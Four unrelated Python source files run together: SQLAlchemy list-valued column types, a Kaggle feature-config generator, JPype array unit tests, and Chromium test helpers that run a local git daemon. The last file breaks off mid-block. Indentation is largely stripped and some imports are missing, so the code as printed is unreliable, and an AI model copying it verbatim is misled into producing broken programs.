from cardinal_pythonlib.logs import get_brace_style_log_with_null_handler
from sqlalchemy.engine.interfaces import Dialect
from sqlalchemy.sql.sqltypes import Text, UnicodeText
from sqlalchemy.sql.type_api import TypeDecorator
log = get_brace_style_log_with_null_handler(__name__)
# =============================================================================
# StringListType
# =============================================================================
class StringListType(TypeDecorator):
r"""
Store a list of strings as CSV.
(Rather less arbitrary in its encoding requirements than e.g.
https://sqlalchemy-utils.readthedocs.io/en/latest/_modules/sqlalchemy_utils/types/scalar_list.html#ScalarListType.)
- 2019-01-01: removed trailing ``\r\n`` (via ``lineterminator=""``).
Some related test code:
.. code-block:: python
import csv
from io import StringIO
pythonlist = [None, 1, "string", "commas, within string", "line 1\nline2"]
output_1 = StringIO()
wr_1 = csv.writer(output_1, quoting=csv.QUOTE_ALL) # appends '\r\n'
wr_1.writerow(pythonlist)
csvstring_1 = output_1.getvalue()
print(repr(csvstring_1))
backtopython_1 = list(csv.reader([csvstring_1]))[0]
print(repr(backtopython_1))
output_2 = StringIO()
wr_2 = csv.writer(output_2, quoting=csv.QUOTE_ALL, lineterminator="")
wr_2.writerow(pythonlist)
csvstring_2 = output_2.getvalue()
print(repr(csvstring_2))
backtopython_2 = list(csv.reader([csvstring_2]))[0]
print(repr(backtopython_2))
assert len(csvstring_1) > len(csvstring_2)
assert backtopython_1 == backtopython_2
So:
- The newline terminator is obviously unnecessary for something that will
always be a single CSV line.
- Eliminating it saves two bytes and adds clarity in the database
representation.
- Eliminating it keeps the system back-compatible, since the reader
happily reads things without the line terminator.
- **NOTE** in particular that this does not behave completely like a plain
Python list on the Python side, as follows.
- When an ORM object is created, the default value on the Python side is
``None``.
- The SQLAlchemy ``default`` option is invoked at ``INSERT``, not at ORM
object creation; see
https://docs.sqlalchemy.org/en/latest/core/metadata.html#sqlalchemy.schema.Column.params.default.
- The SQLAlchemy ``server_default`` is the DDL ``DEFAULT`` value, not a
Python default.
- On database load, everything is fine (as ``process_result_value`` will
be called, which can translate a database ``NULL`` to a Python ``[]``).
- So that means that **if you want the field to be a list rather than
None from the outset,** you must set it to ``[]`` from ``__init__()``.
- Secondly, SQLAlchemy makes its columns behave in a special way **upon
assignment**. So, in particular, ``mylist.append(value)`` will not itself
mark the field as "dirty" and in need of writing to the database.
- Internally, suppose we define (on the class) ``mycol =
Column(Integer)``, and then create an instance via ``instance =
cls()``.
- Then ``cls.mycol`` will actually be of type
:class:`sqlalchemy.orm.attributes.InstrumentedAttribute`, and
``instance.mycol`` will be of type ``int`` (or ``NoneType`` if it's
``None``).
.. code-block:: python
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.sql.schema import Column
from sqlalchemy.sql.sqltypes import Integer
Base = declarative_base()
class MyClass(Base):
__tablename__ = "mytable"
pk = Column(Integer, primary_key=True)
mycol = Column(Integer)
instance = MyClass()
type(MyClass.pk) # <class 'sqlalchemy.orm.attributes.InstrumentedAttribute'>
type(instance.pk) # <class 'NoneType'>
- The class :class:`sqlalchemy.orm.attributes.InstrumentedAttribute`
implements :meth:`__set__`, :meth:`__delete__`, and :meth:`__get__`.
This means that when you write ``instance.mycol = 5``, it calls the
``__set__()`` function; see
https://docs.python.org/3.7/howto/descriptor.html.
- So, for a list (e.g. ``mylist = Column(StringListType)``, if you write
``mylist = [value1, value2]``, it will call the appropriate
``__set__()`` function and mark the field as "dirty" (see e.g.
:meth:`sqlalchemy.orm.attributes.ScalarAttributeImpl.set`). **But** if
``mylist`` is already a list and you write ``mylist.append(value)``,
the ``__set__()`` function won't be called.
- If you haven't yet written the instance to the database, this doesn't
matter; "new" values are considered dirty and are written to the
database fine. But if you (a) create, (b) save, and then (c) append to
a list, the change won't be noticed. Since SQLAlchemy can save objects
for you as soon as another object needs to know its PK, the fact that
(b) has happened may not be obvious.
- Therefore, in short, **beware append() and use assignment** for these
sorts of lists, if this might apply; e.g. ``mylist = mylist +
[value]``.
- Don't use ``+=``, either; that calls ``list.__iadd__()`` and modifies
the existing list, rather than calling
``InstrumentedAttribute.__set__()``.
- So one method is to ignore ``__init__()`` (meaning new instances will
  have the list-type field set to ``None``) and then to use this sort of
  access function:
.. code-block:: python
def add_to_mylist(self, text: str) -> None:
if self.mylist is None:
self.mylist = [text]
else:
# noinspection PyAugmentAssignment
self.mylist = self.mylist + [text] # not "append()", not "+="
""" # noqa
impl = UnicodeText()
@property
def python_type(self):
return list
@staticmethod
def _strlist_to_dbstr(strlist: Optional[List[str]]) -> str:
if not strlist:
return ""
output = StringIO()
wr = csv.writer(output, quoting=csv.QUOTE_ALL, lineterminator="")
wr.writerow(strlist)
return output.getvalue()
@staticmethod
def _dbstr_to_strlist(dbstr: Optional[str]) -> List[str]:
if not dbstr:
return []
try:
return list(csv.reader([dbstr]))[0]
# ... list( generator( list_of_lines ) )[first_line]
except csv.Error:
log.warning("StringListType: Unable to convert database value of "
"{!r} to Python; returning empty list", dbstr)
return []
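# Note: None and [] both serialize to "", and "" deserializes to [],
# so the None-vs-empty-list distinction is not preserved across a
# round trip.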
def process_bind_param(self, value: Optional[List[str]],
dialect: Dialect) -> str:
"""Convert things on the way from Python to the database."""
retval = self._strlist_to_dbstr(value)
return retval
def process_literal_param(self, value: Optional[List[str]],
dialect: Dialect) -> str:
"""Convert things on the way from Python to the database."""
retval = self._strlist_to_dbstr(value)
return retval
# Could also use "process_literal_param = process_bind_param"
# or vice versa, but this adds some clarity via docstrings.
def process_result_value(self, value: Optional[str],
dialect: Dialect) -> List[str]:
"""Convert things on the way from the database to Python."""
retval = self._dbstr_to_strlist(value)
return retval
# =============================================================================
# IntListType
# =============================================================================
class IntListType(TypeDecorator):
"""
Store a list of integers as CSV.
**Note:** see :class:`StringListType` for a general discussion about
SQLAlchemy types where the Python representation is a list; they can seem
slightly unusual.
"""
impl = Text()
@property
def python_type(self):
return list
@staticmethod
def _intlist_to_dbstr(intlist: Optional[List[int]]) -> str:
if not intlist:
return ""
return ",".join(str(x) for x in intlist)
@staticmethod
def _dbstr_to_intlist(dbstr: Optional[str]) -> List[int]:
if not dbstr:
return []
try:
return [int(x) for x in dbstr.split(",")]
except (TypeError, ValueError):
log.warning("IntListType: Unable to convert database value of {!r}"
" to Python; returning empty list", dbstr)
return []
def process_bind_param(self, value: Optional[List[int]],
dialect: Dialect) -> str:
"""Convert things on the way from Python to the database."""
retval = self._intlist_to_dbstr(value)
return retval
def process_literal_param(self, value: Optional[List[int]],
dialect: Dialect) -> str:
"""Convert things on the way from Python to the database."""
retval = self._intlist_to_dbstr(value)
return retval
def process_result_value(self, value: Optional[str],
dialect: Dialect) -> List[int]:
"""Convert things on the way from the database to Python."""
retval = self._dbstr_to_intlist(value)
return retval
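
# Hedged usage sketch: round-tripping both list types through an
# in-memory SQLite database. Assumes SQLAlchemy 1.4+ for the
# declarative_base/Session imports; the Demo class and table name are
# illustrative only.
if __name__ == "__main__":
    from sqlalchemy import create_engine, Column, Integer
    from sqlalchemy.orm import declarative_base, Session

    Base = declarative_base()

    class Demo(Base):
        __tablename__ = "demo"
        pk = Column(Integer, primary_key=True)
        tags = Column(StringListType())
        nums = Column(IntListType())

    engine = create_engine("sqlite://")
    Base.metadata.create_all(engine)
    with Session(engine) as session:
        # Assign whole lists; per the StringListType docstring, prefer
        # assignment over append() so changes are detected.
        session.add(Demo(pk=1, tags=["a", "b,c"], nums=[1, 2, 3]))
        session.commit()
        row = session.get(Demo, 1)
        assert row.tags == ["a", "b,c"]
        assert row.nums == [1, 2, 3]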
|
|
# -*- coding: utf-8 -*-
"""
@author: Chenglong Chen <c.chenglong@gmail.com>
@brief: generate feature conf for the following models (most of which are linear models)
- reg_skl_ridge
- reg_skl_bayesian_ridge
- reg_skl_lasso
- reg_skl_lsvr
- reg_xgb_linear
- reg_keras_dnn (nonlinear models)
@note:
- such features DO NOT INCLUDE "DocId_(search_term|product_title|product_color|product_brand)"
- one can tune the MANDATORY_FEATS and COMMENT_OUT_FEATS to generate different feature subset
"""
import re
import os
from optparse import OptionParser
import config
from utils import time_utils
INCLUDE_FEATS = [
".+"
]
COUNT_FEATS = [
"Freq",
"Len",
"Count",
"Size",
"Position",
]
# COUNT_FEATS = []
NOT_COUNT_FEATS = ["Norm", "Ratio"]
MANDATORY_FEATS = [
# including product_uid according to
# https://www.kaggle.com/c/home-depot-product-search-relevance/forums/t/20288/trends-in-relevances-by-row-ids/115886#post115886
"DocIdEcho_product_uid",
"ProductUidDummy1_product_uid",
"ProductUidDummy2_product_uid",
"IsInGoogleDict",
"GroupRelevance_Size",
"TSNE",
]
COMMENT_OUT_FEATS = [
#-------------- General --------------
"search_term_alt",
"Bigram",
"Trigram",
"UBgram",
"UBTgram",
"Median",
"Std",
".+(Bigram|Trigram)_.+_product_(brand|color)",
#-------------- Basic --------------
"DocLogFreq",
"Digit",
"Unique",
"^DocIdOneHot",
"^DocId",
"DocLen_product_(brand|color)",
"DocLen_product_attribute_1D",
"DocFreq_product_description_1D",
"DocFreq_product_attribute_1D",
"Digit(Count|Ratio)_product_(brand|color)",
"Doc(Entropy|Len)_product_(brand|color)",
"Unique(Count|Ratio)_.+_product_(brand|color)",
#-------------- Distance --------------
"DiceDistance",
# "EditDistance",
"Compression",
#-------------- First and Last Ngram --------------
"FirstIntersectNormPosition",
"FirstIntersectPosition",
"LastIntersectNormPosition",
"LastIntersectPosition",
#-------------- Group --------------
"GroupRelevance_(Mean|Std|Max|Min|Median)",
"Group_\d+",
"GroupDistanceStat",
#-------------- Intersect Count & Position --------------
"IntersectPosition_.+_(Std|Max|Min|Median)",
"IntersectNormPosition_.+_(Std|Max|Min|Median)",
#-------------- Match --------------
"LongestMatchSize",
#-------------- StatCooc --------------
# since product_name is of length 2, its bigram list has only one item,
# so the various aggregations (Std/Max/Min/Median) make no difference
"StatCooc(TF|NormTF|TFIDF|NormTFIDF|BM25)_Bigram_(Std|Max|Min|Median)_search_term_product_name_x_product_title_product_name_1D",
"StatCooc(TF|NormTF|TFIDF|NormTFIDF|BM25)_Bigram_(Std|Max|Min|Median)_product_title_product_name_x_search_term_product_name_1D",
"NormTF",
"NormTFIDF",
#-------------- Vector Space --------------
# as TFIDF_Word_Trigram has the largest corr
"LSA\d+_Word_Unigram",
"LSA\d+_Word_Bigram",
"TFIDF_Word_Unigram",
"TFIDF_Word_Bigram",
# as TFIDF_Char_Fourgram has the largest corr
"LSA\d+_Char_Bigram",
"LSA\d+_Char_Trigram",
"LSA\d+_Char_Fivegram",
"TFIDF_Char_Bigram",
"TFIDF_Char_Trigram",
"TFIDF_Char_Fivegram",
"CharDistribution_Ratio",
#-------------- Word2Vec & Doc2Vec --------------
"_Vector_",
"_Vdiff_",
"Word2Vec_Wikipedia_D50",
"Word2Vec_Wikipedia_D100",
"Word2Vec_Wikipedia_D200",
# "Word2Vec_GoogleNews",
"Word2Vec_GoogleNews_D300_Vector",
# as all the words are used to train the model
"Word2Vec_Homedepot_D100_Importance",
"Word2Vec_Homedepot_D100_N_Similarity_Imp",
#-------------- Turing Test --------------
# d = {
# "df_basic_features.csv": "Basic",
# "df_brand_material_dummies.csv": "BrandMaterialDummy",
# "df_dist_new.csv": "Dist",
# "dld_features.csv": "DLD",
# "df_st_tfidf.csv": "StTFIDF",
# "df_tfidf_intersept_new.csv": "TFIDF",
# "df_thekey_dummies.csv": "TheKeyDummy",
# "df_word2vec_new.csv": "Word2Vec",
# }
# "TuringTest_Basic",
# "TuringTest_BrandMaterialDummy",
# "TuringTest_Dist",
# "TuringTest_DLD",
# "TuringTest_StTFIDF",
# "TuringTest_TFIDF",
# "TuringTest_TheKeyDummy",
# "TuringTest_Word2Vec",
]
def _check_include(fname):
for v in INCLUDE_FEATS:
pat = re.compile(v)
if len(re.findall(pat, fname)) > 0:
return True
return False
def _check_count_feat(fname):
for v in NOT_COUNT_FEATS:
pat = re.compile(v)
if len(re.findall(pat, fname)) > 0:
return False
for v in COUNT_FEATS:
pat = re.compile(v)
if len(re.findall(pat, fname)) > 0:
return True
return False
def _check_lsa_matrix(fname):
pat = re.compile("^LSA")
if len(re.findall(pat, fname)) > 0:
return True
return False
def _check_mandatory(fname):
for v in MANDATORY_FEATS:
pat = re.compile(v)
if len(re.findall(pat, fname)) > 0:
return True
return False
def _check_comment_out(fname):
for v in COMMENT_OUT_FEATS:
pat = re.compile(v)
if len(re.findall(pat, fname)) > 0:
return True
return False
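# A hedged, self-contained sketch (not used by the conf generation itself):
# how the regex filters above classify a few illustrative feature names.
def _demo_checks():
    assert _check_count_feat("WordCount_search_term_1D")       # "Count" matches
    assert not _check_count_feat("CountRatio_search_term_1D")  # "Ratio" wins
    assert _check_lsa_matrix("LSA100_Word_Trigram")            # "^LSA" matches
    assert _check_mandatory("DocIdEcho_product_uid")           # listed above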
header_pattern = """
# -*- coding: utf-8 -*-
\"\"\"
@author: Chenglong Chen <c.chenglong@gmail.com>
@brief: one feature conf
Generated by
python %s -d %d -o %s
Format:
FEATURE_NAME : (MANDATORY, TRANSFORM)
\"\"\"
import config
from feature_transformer import SimpleTransform, ColumnSelector
LSA_COLUMNS = range(%d)
feature_dict = {
"""
def _create_feature_conf(lsa_columns, outfile):
res = header_pattern%(__file__, int(lsa_columns), outfile, int(lsa_columns))
folders = [config.FEAT_DIR, config.FEAT_DIR+"/All"]
for folder in folders:
try:
for file in sorted(os.listdir(folder)):
if config.FEAT_FILE_SUFFIX in file:
fname = file.split(".")[0]
if _check_include(fname):
line = ""
mandatory = _check_mandatory(fname)
if not mandatory and _check_comment_out(fname):
continue
line += "# "
line += "'%s' : "%fname
if mandatory:
line += "(True, "
else:
line += "(False, "
if _check_lsa_matrix(fname):
if int(lsa_columns) > 0:
line += "ColumnSelector(LSA_COLUMNS)),\n"
else:
continue
elif _check_count_feat(fname):
line += "SimpleTransform(config.COUNT_TRANSFORM)),\n"
else:
line += "SimpleTransform()),\n"
res += line
except OSError:
    # The folder may not exist; skip it.
    pass
res += "}\n"
with open(os.path.join(config.FEAT_CONF_DIR, outfile), "w") as f:
f.write(res)
def parse_args(parser):
parser.add_option("-d", "--dim", default=1, type=int, dest="lsa_columns",
help="lsa_columns")
parser.add_option("-o", "--outfile", default="feature_conf_%s.py"%time_utils._timestamp(),
type="string", dest="outfile", help="outfile")
(options, args) = parser.parse_args()
return options, args
def main(options):
_create_feature_conf(lsa_columns=options.lsa_columns, outfile=options.outfile)
if __name__ == "__main__":
parser = OptionParser()
options, args = parse_args(parser)
main(options)
|
|
#*****************************************************************************
# Copyright 2004-2008 Steve Menard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#*****************************************************************************
try:
import unittest2 as unittest
except ImportError:
import unittest
import sys
import jpype
from jpype import JPackage, JArray, JByte, java
from . import common
if sys.version > '3':
unicode = str
def haveNumpy():
try:
import numpy
return True
except ImportError:
return False
class ArrayTestCase(common.JPypeTestCase) :
def setUp(self):
common.JPypeTestCase.setUp(self)
self.VALUES = [12234,1234,234,1324,424,234,234,142,5,251,242,35,235,62,
1235,46,245132,51, 2, 3, 4]
def testReadArray(self) :
t = JPackage("jpype").array.TestArray()
self.assertNotIsInstance(t, JPackage)
self.assertCountEqual(self.VALUES, t.i)
self.assertEqual(t.i[0], self.VALUES[0])
self.assertCountEqual(self.VALUES[1:-2], t.i[1:-2])
def testStrangeBehavior(self) :
    ''' Test for strange crash reported in bug #1089302'''
Test2 = jpype.JPackage('jpype.array').Test2
test = Test2()
test.test(test.getValue())
def testWriteArray(self) :
t = JPackage("jpype").array.TestArray()
self.assertNotIsInstance(t, JPackage)
t.i[0] = 32
self.assertEqual(t.i[0], 32)
t.i[1:3] = (33, 34)
self.assertEqual(t.i[1], 33)
self.assertEqual(t.i[2], 34)
self.assertCountEqual(t.i[:5], (32, 33, 34 ,1324, 424) )
def testObjectArraySimple(self) :
a = JArray(java.lang.String, 1)(2)
a[1] = "Foo"
self.assertEqual("Foo", a[1])
def testByteArraySimple(self) :
a = JArray(JByte)(2)
a[1] = 2
self.assertEqual(a[1], 2)
def testIterateArray(self):
t = JPackage("jpype").array.TestArray()
self.assertFalse(isinstance(t, JPackage))
for i in t.i :
self.assertNotEqual(i, 0)
def testGetSubclass(self) :
t = JPackage("jpype").array.TestArray()
v = t.getSubClassArray()
self.assertTrue(isinstance(v[0], unicode))
def testGetArrayAsObject(self) :
t = JPackage("jpype").array.TestArray()
v = t.getArrayAsObject()
def testCharArrayAsString(self) :
t = JPackage("jpype").array.TestArray()
v = t.charArray
self.assertEqual(str(v), 'avcd')
self.assertEqual(unicode(v), u'avcd')
def testByteArrayAsString(self) :
t = JPackage("jpype").array.TestArray()
v = t.byteArray
self.assertEqual(str(v), 'avcd')
def testByteArrayIntoVector(self):
ba = jpype.JArray(jpype.JByte)(b'123')
v = jpype.java.util.Vector(1)
v.add(ba)
self.assertEqual(len(v), 1)
self.assertNotEqual(v[0], None)
def testJArrayConversionBool(self):
expected = [True, False, False, True]
jarr = jpype.JArray(jpype.JBoolean)(expected)
self.assertCountEqual(expected, jarr[:])
def testJArrayConversionChar(self):
t = JPackage("jpype").array.TestArray()
v = t.charArray
self.assertEqual(v[:], 'avcd')
# FIXME: this returns unicode on windows
self.assertEqual(str(v[:]), 'avcd')
self.assertEqual(unicode(v[:]), u'avcd')
def testJArrayConversionByte(self):
expected = (0,1,2,3)
ByteBuffer = jpype.java.nio.ByteBuffer
bb = ByteBuffer.allocate(4)
buf = bb.array()
for i in range(len(expected)):
buf[i] = expected[i]
self.assertCountEqual(expected[:], buf[:])
def testJArrayConversionShort(self):
# filter out values which cannot be represented as a jshort
# (16-bit signed integer: -32768 .. 32767)
self.VALUES = [v for v in self.VALUES
               if -2**15 <= v <= 2**15 - 1]
jarr = jpype.JArray(jpype.JShort)(self.VALUES)
result = jarr[0 : len(jarr)]
self.assertCountEqual(self.VALUES, result)
result = jarr[2:10]
self.assertCountEqual(self.VALUES[2:10], result)
# TODO: investigate why the overflow is cast on Linux, but not on Windows
#with self.assertRaises(jpype._):
# jpype.JArray(jpype.JShort)([2**16/2])
def testJArrayConversionInt(self):
jarr = jpype.JArray(jpype.JInt)(self.VALUES)
result = jarr[0 : len(jarr)]
self.assertCountEqual(self.VALUES, result)
result = jarr[2:10]
self.assertCountEqual(self.VALUES[2:10], result)
def testJArrayConversionLong(self):
jarr = jpype.JArray(jpype.JLong)(self.VALUES)
result = jarr[0 : len(jarr)]
self.assertCountEqual(self.VALUES, result)
result = jarr[2:10]
self.assertCountEqual(self.VALUES[2:10], result)
def testJArrayConversionFloat(self):
VALUES = [float(x) for x in self.VALUES]
jarr = jpype.JArray(jpype.JFloat)(VALUES)
result = jarr[0 : len(jarr)]
self.assertCountEqual(jarr, result)
result = jarr[2:10]
self.assertCountEqual(VALUES[2:10], result)
def testJArrayConversionDouble(self):
VALUES = [float(x) for x in self.VALUES]
jarr = jpype.JArray(jpype.JDouble)(VALUES)
self.assertCountEqual(VALUES, jarr)
result = jarr[:]
self.assertCountEqual(VALUES, result)
result = jarr[2:10]
self.assertEqual(len(VALUES[2:10]), len(result))
self.assertCountEqual(VALUES[2:10], result)
# empty slice
result = jarr[-1:3]
expected = VALUES[-1:3]
self.assertCountEqual(expected, result)
result = jarr[3:-2]
expected = VALUES[3:-2]
self.assertCountEqual(expected, result)
def testConversionError(self):
jarr = jpype.JArray(jpype.JInt, 1)(10)
with self.assertRaises(RuntimeError):
jarr[1:2] = [dict()]
# Python returns -1 if the conversion fails; ensure this still works
jarr[1:2] = [-1]
def testObjectArrayInitial(self):
l1 = java.util.ArrayList()
l1.add(0)
l2 = java.util.ArrayList()
l2.add(42)
l3 = java.util.ArrayList()
l3.add(13)
jarr = jpype.JArray(java.util.ArrayList, 1)([l1, l2, l3])
self.assertEqual(l1, jarr[0])
self.assertEqual(l2, jarr[1])
self.assertEqual(l3, jarr[2])
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPBoolArray(self):
import numpy as np
n = 100
# randint's upper bound is exclusive, so use 2 to get both values;
# np.bool_ replaces the long-deprecated np.bool alias
a = np.random.randint(0, 2, size=n).astype(np.bool_)
jarr = jpype.JArray(jpype.JBoolean)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPByteArray(self):
import numpy as np
n = 100
a = np.random.randint(-128, 127, size=n).astype(np.byte)
jarr = jpype.JArray(jpype.JByte)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPShortArray(self):
import numpy as np
n = 100
a = np.random.randint(-32768, 32767, size=n).astype(np.short)
jarr = jpype.JArray(jpype.JShort)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPIntArray(self):
import numpy as np
n = 100
a = np.random.randint(-2**31, 2**31 - 1, size=n).astype(np.int32)
jarr = jpype.JArray(jpype.JInt)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPLongArray(self):
import numpy as np
n = 100
# the int64 range is -2**63 .. 2**63 - 1; randint's upper bound is
# exclusive, and using 2**63 raises an OverflowError in numpy
a = np.random.randint(-2**63, 2**63 - 1, size=n).astype(np.int64)
jarr = jpype.JArray(jpype.JLong)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPFloatArray(self):
import numpy as np
n = 100
a = np.random.random(n).astype(np.float32)
jarr = jpype.JArray(jpype.JFloat)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPDoubleArray(self):
import numpy as np
n = 100
a = np.random.random(n).astype(np.float64)
jarr = jpype.JArray(jpype.JDouble)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
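
# Hedged convenience, not part of the original suite: allows running the
# tests with "python -m" from within the package (direct file execution
# would fail on the relative "from . import common" above).
if __name__ == '__main__':
    unittest.main()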
|
|
#!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generate fake repositories for testing."""
import atexit
import datetime
import errno
import logging
import os
import pprint
import re
import socket
import sys
import tempfile
import textwrap
import time
# trial_dir must be first for non-system libraries.
from testing_support import trial_dir
import gclient_utils
import scm
import subprocess2
def write(path, content):
f = open(path, 'wb')
f.write(content)
f.close()
join = os.path.join
def read_tree(tree_root):
"""Returns a dict of all the files in a tree. Defaults to self.root_dir."""
tree = {}
for root, dirs, files in os.walk(tree_root):
for d in filter(lambda x: x.startswith('.'), dirs):
dirs.remove(d)
for f in [join(root, f) for f in files if not f.startswith('.')]:
filepath = f[len(tree_root) + 1:].replace(os.sep, '/')
assert len(filepath), f
tree[filepath] = open(join(root, f), 'rU').read()
return tree
def dict_diff(dict1, dict2):
diff = {}
for k, v in dict1.iteritems():
if k not in dict2:
diff[k] = v
elif v != dict2[k]:
diff[k] = (v, dict2[k])
for k, v in dict2.iteritems():
if k not in dict1:
diff[k] = v
return diff
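# Hedged illustration of dict_diff(): keys present in only one dict map
# to their single value; keys present in both with different values map
# to a (dict1_value, dict2_value) tuple. For example:
#   dict_diff({'a': 1, 'b': 2}, {'b': 3, 'c': 4})
#   -> {'a': 1, 'b': (2, 3), 'c': 4}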
def commit_git(repo):
"""Commits the changes and returns the new hash."""
subprocess2.check_call(['git', 'add', '-A', '-f'], cwd=repo)
subprocess2.check_call(['git', 'commit', '-q', '--message', 'foo'], cwd=repo)
rev = subprocess2.check_output(
['git', 'show-ref', '--head', 'HEAD'], cwd=repo).split(' ', 1)[0]
logging.debug('At revision %s' % rev)
return rev
def test_port(host, port):
s = socket.socket()
try:
return s.connect_ex((host, port)) == 0
finally:
s.close()
def find_free_port(host, base_port):
"""Finds a listening port free to listen to."""
while base_port < (1 << 16):  # valid TCP ports are below 65536
if not test_port(host, base_port):
return base_port
base_port += 1
assert False, 'Having issues finding an available port'
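# Hedged example: find_free_port('127.0.0.1', 20000) returns the first
# port at or above 20000 that nothing is currently listening on.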
def wait_for_port_to_bind(host, port, process):
sock = socket.socket()
if sys.platform == 'darwin':
# On Mac SnowLeopard, if we attempt to connect to the socket
# immediately, it fails with EINVAL and never gets a chance to
# connect (putting us into a hard spin and then failing).
# Linux doesn't need this.
time.sleep(0.2)
try:
start = datetime.datetime.utcnow()
maxdelay = datetime.timedelta(seconds=30)
while (datetime.datetime.utcnow() - start) < maxdelay:
try:
sock.connect((host, port))
logging.debug('%d is now bound' % port)
return
except (socket.error, EnvironmentError):
pass
logging.debug('%d is still not bound' % port)
finally:
sock.close()
# The process failed to bind. Kill it and dump its output.
process.kill()
logging.error('%s' % process.communicate()[0])
assert False, '%d is still not bound' % port
def wait_for_port_to_free(host, port):
start = datetime.datetime.utcnow()
maxdelay = datetime.timedelta(seconds=30)
while (datetime.datetime.utcnow() - start) < maxdelay:
try:
sock = socket.socket()
sock.connect((host, port))
logging.debug('%d was bound, waiting to free' % port)
except (socket.error, EnvironmentError):
logging.debug('%d now free' % port)
return
finally:
sock.close()
assert False, '%d is still bound' % port
class FakeReposBase(object):
"""Generate git repositories to test gclient functionality.
Many DEPS functionalities need to be tested: Var, deps_os, hooks,
use_relative_paths.
And types of dependencies: Relative urls, Full urls, git.
populateGit() needs to be implemented by the subclass.
"""
# Hostname
NB_GIT_REPOS = 1
USERS = [
('user1@example.com', 'foo'),
('user2@example.com', 'bar'),
]
def __init__(self, host=None):
self.trial = trial_dir.TrialDir('repos')
self.host = host or '127.0.0.1'
# Format is { repo: [ None, (hash, tree), (hash, tree), ... ], ... }
# so reference looks like self.git_hashes[repo][rev][0] for hash and
# self.git_hashes[repo][rev][1] for it's tree snapshot.
# It is 1-based too.
self.git_hashes = {}
self.gitdaemon = None
self.git_pid_file = None
self.git_root = None
self.git_dirty = False
self.git_port = None
self.git_base = None
@property
def root_dir(self):
return self.trial.root_dir
def set_up(self):
"""All late initialization comes here."""
self.cleanup_dirt()
if not self.root_dir:
try:
# self.root_dir is not set before this call.
self.trial.set_up()
self.git_root = join(self.root_dir, 'git')
finally:
# Registers cleanup.
atexit.register(self.tear_down)
def cleanup_dirt(self):
"""For each dirty repository, destroy it."""
if self.git_dirty:
if not self.tear_down_git():
logging.error('Using both leaking checkout and git dirty checkout')
def tear_down(self):
"""Kills the servers and delete the directories."""
self.tear_down_git()
# This deletes the directories.
self.trial.tear_down()
self.trial = None
def tear_down_git(self):
if self.gitdaemon:
logging.debug('Killing git-daemon pid %s' % self.gitdaemon.pid)
self.gitdaemon.kill()
self.gitdaemon = None
if self.git_pid_file:
pid = int(self.git_pid_file.read())
self.git_pid_file.close()
logging.debug('Killing git daemon pid %s' % pid)
try:
subprocess2.kill_pid(pid)
except OSError as e:
if e.errno != errno.ESRCH: # no such process
raise
self.git_pid_file = None
wait_for_port_to_free(self.host, self.git_port)
self.git_port = None
self.git_base = None
if not self.trial.SHOULD_LEAK:
logging.debug('Removing %s' % self.git_root)
gclient_utils.rmtree(self.git_root)
else:
return False
return True
@staticmethod
def _genTree(root, tree_dict):
"""For a dictionary of file contents, generate a filesystem."""
if not os.path.isdir(root):
os.makedirs(root)
for (k, v) in tree_dict.iteritems():
k_os = k.replace('/', os.sep)
k_arr = k_os.split(os.sep)
if len(k_arr) > 1:
p = os.sep.join([root] + k_arr[:-1])
if not os.path.isdir(p):
os.makedirs(p)
if v is None:
os.remove(join(root, k))
else:
write(join(root, k), v)
def set_up_git(self):
"""Creates git repositories and start the servers."""
self.set_up()
if self.gitdaemon:
return True
assert self.git_pid_file is None
try:
subprocess2.check_output(['git', '--version'])
except (OSError, subprocess2.CalledProcessError):
return False
for repo in ['repo_%d' % r for r in range(1, self.NB_GIT_REPOS + 1)]:
subprocess2.check_call(['git', 'init', '-q', join(self.git_root, repo)])
self.git_hashes[repo] = [None]
self.git_port = find_free_port(self.host, 20000)
self.git_base = 'git://%s:%d/git/' % (self.host, self.git_port)
# Start the daemon.
self.git_pid_file = tempfile.NamedTemporaryFile()
cmd = ['git', 'daemon',
'--export-all',
'--reuseaddr',
'--base-path=' + self.root_dir,
'--pid-file=' + self.git_pid_file.name,
'--port=%d' % self.git_port]
if self.host == '127.0.0.1':
cmd.append('--listen=' + self.host)
self.check_port_is_free(self.git_port)
self.gitdaemon = subprocess2.Popen(
cmd,
cwd=self.root_dir,
stdout=subprocess2.PIPE,
stderr=subprocess2.PIPE)
wait_for_port_to_bind(self.host, self.git_port, self.gitdaemon)
self.populateGit()
self.git_dirty = False
return True
def _git_rev_parse(self, path):
return subprocess2.check_output(
['git', 'rev-parse', 'HEAD'], cwd=path).strip()
def _commit_git(self, repo, tree):
repo_root = join(self.git_root, repo)
self._genTree(repo_root, tree)
commit_hash = commit_git(repo_root)
if self.git_hashes[repo][-1]:
new_tree = self.git_hashes[repo][-1][1].copy()
new_tree.update(tree)
else:
new_tree = tree.copy()
self.git_hashes[repo].append((commit_hash, new_tree))
def _fast_import_git(self, repo, data):
repo_root = join(self.git_root, repo)
logging.debug('%s: fast-import %s', repo, data)
subprocess2.check_call(
['git', 'fast-import', '--quiet'], cwd=repo_root, stdin=data)
def check_port_is_free(self, port):
sock = socket.socket()
try:
sock.connect((self.host, port))
# It worked, throw.
assert False, '%d shouldn\'t be bound' % port
except (socket.error, EnvironmentError):
pass
finally:
